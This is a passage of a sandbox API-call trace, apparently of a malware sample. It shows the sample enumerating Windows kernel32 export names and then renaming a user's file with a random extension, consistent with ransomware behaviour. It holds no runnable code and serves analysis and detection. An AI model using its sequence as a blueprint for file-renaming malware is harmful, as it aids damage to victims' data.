returned="CreateDirectoryExA" [0076.880] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.880] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.880] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.880] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.881] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.881] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.881] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.881] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.881] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.881] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.881] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.881] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.881] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.881] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.881] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.881] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.881] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.881] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.881] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.881] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.881] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.881] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.881] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.882] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.882] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.882] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.882] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.882] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.882] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.882] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.882] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.882] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.882] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.882] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.882] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.882] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.882] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.882] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.882] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.882] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.882] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.882] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.882] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.883] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.883] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.883] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.883] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.883] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.883] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.883] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.883] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.883] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.883] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.883] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.883] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.883] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.883] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.883] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.883] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.883] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.883] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.883] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.884] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.884] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.884] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.884] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.884] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.884] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.884] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.884] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.884] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.884] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.884] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.884] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.884] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.884] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.884] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.884] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.884] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.884] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.884] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.885] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.885] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.885] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.885] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.885] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.885] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.885] lstrlenA (lpString="DELETEATOM") returned 10 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.885] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.885] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.885] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.885] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.885] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.885] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.885] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.885] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.885] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.885] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.885] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.885] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.886] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.886] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.886] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.886] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.886] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.886] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.886] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.886] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.886] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.886] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.886] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.886] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.886] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.886] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.886] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.886] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.886] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.886] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.886] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.887] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.887] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.887] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.887] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.887] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.887] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.887] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.887] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.887] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.887] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.887] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.887] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.887] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.887] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 127 [0076.887] wsprintfW (in: param_1=0x3f2d238, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.Zd8GX") returned 133 [0076.888] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 